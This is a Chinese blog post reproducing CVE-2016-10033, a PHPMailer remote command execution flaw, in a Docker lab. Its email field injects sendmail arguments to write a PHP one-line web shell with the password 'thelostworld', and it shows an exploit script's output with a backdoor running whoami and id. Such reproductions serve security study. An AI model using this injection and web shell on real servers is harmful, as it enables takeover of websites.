PHPMailer遠端命令執行漏洞復現
PHPMailer遠端命令執行漏洞復現
一、漏洞簡介
PHPMailer是PHP電子郵件建立及傳輸類,用於多個開源專案:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未經身份驗證的遠端攻擊者在Web伺服器使用者上下文中執行任意程式碼,遠端控制目標web應用。
二、影響版本:
PHPMailer<5.2.18
三、漏洞復現
Docker環境:
dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033
拉去映象啟動環境:
http://192.168.1.107:8080/
http://192.168.1.107:8080/在name處隨便輸入比如“aaa”,在email處輸入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話木馬:<?php@eval($_POST['thelostworld']);?>
上傳完一句話木馬後,頁面會響應3-5分鐘,響應時間較長
木馬地址:http://192.168.1.107:8080/a.php 密碼:thelostworld
虛擬終端:
使用指令碼:
獲取指令碼後臺回覆“PHPMailer”獲取指令碼
➜ Desktop ./exploit.sh192.168.1.107:8080[+] CVE-2016-10033exploitbyopsxcq[+] Exploiting192.168.1.107:8080[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php[+] Checkingifthe backdoor was createdontarget system[+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)
訪問木馬地址:
http://192.168.1.107:8080/backdoor.php
參考:
https://www.cnblogs.com/Hi-blog/p/7812008.html
https://www.exploit-db.com/exploits/40968
免責宣告:本站提供安全工具、程式(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載宣告:著作權歸作者所有。商業轉載請聯絡作者獲得授權,非商業轉載請註明出處。
訂閱檢視更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人部落格園:https://www.cnblogs.com/thelostworld/
FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article
歡迎新增本公眾號作者微信交流,新增時備註一下“公眾號”
相關文章
- CVE-2017-8464遠端命令執行漏洞復現
- ThinkPHP 5.x 遠端命令執行漏洞分析與復現PHP
- 靶機練習---通達OA,遠端命令執行漏洞復現
- CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現Spring
- CNVD-2018-01084 漏洞復現報告(service.cgi 遠端命令執行漏洞)
- Apache SSI 遠端命令執行漏洞Apache
- Firefox 31~34遠端命令執行漏洞的分析Firefox
- Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現Apache
- Apache Kylin遠端程式碼執行漏洞復現(CVE-2020-1956)Apache
- Apache log4j2 遠端程式碼執行漏洞復現?Apache
- Go實現ssh執行遠端命令及遠端終端Go
- Apache struts2 namespace遠端命令執行_CVE-2018-11776(S2-057)漏洞復現Apachenamespace
- Apache Log4j2遠端命令執行漏洞Apache
- 【安全公告】Spring Core遠端命令執行漏洞預警Spring
- Tomcat CGIServlet enableCmdLineArguments遠端程式碼執行_CVE-2019-0232漏洞復現TomcatServlet
- CVE-2017-7269 IIS6.0遠端程式碼執行漏洞復現
- Windows漏洞:MS08-067遠端程式碼執行漏洞復現及深度防禦Windows
- weblogic許可權繞過/遠端命令執行漏洞復現(CVE-2020-14482、CVE-2020-14883)Web
- DHCP命令執行CVE-2018-1111漏洞復現
- PKAV 發現 Struts2 最新遠端命令執行漏洞(S2-037)
- Apache struts2 Freemarker標籤遠端命令執行_CVE-2017-12611(S2-053)漏洞復現Apache
- ThinkPHP遠端程式碼執行漏洞PHP
- phpunit 遠端程式碼執行漏洞PHP
- xxl-job預設accessToken命令執行漏洞復現
- 最新漏洞:Spring Framework遠端程式碼執行漏洞SpringFramework
- ThinkPHP 5.0.23 遠端程式碼執行漏洞PHP
- OpenWRT 曝遠端程式碼執行漏洞
- Joomla遠端程式碼執行漏洞分析OOM
- Weblogic遠端程式碼執行漏洞(CVE-2020-14750)修復方案Web
- GitLab存在嚴重漏洞,允許透過Github匯入實現遠端命令執行GitlabGithub
- Apache Struts2遠端程式碼執行漏洞(S2-001)復現總結Apache
- CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現
- WebLogic 任意檔案上傳遠端程式碼執行_CVE-2018-2894漏洞復現Web
- CVE-2015-1635-HTTP.SYS遠端執行程式碼漏洞復現HTTP行程
- RCE(遠端程式碼執行漏洞)原理及漏洞利用
- 高危漏洞!Apache Log4j 遠端程式碼執行漏洞(附修復建議)Apache
- Oracle WebLogic 曝 0day 漏洞,攻擊者可遠端執行命令OracleWeb
- WindowsJScript元件曝遠端程式碼執行漏洞WindowsJS元件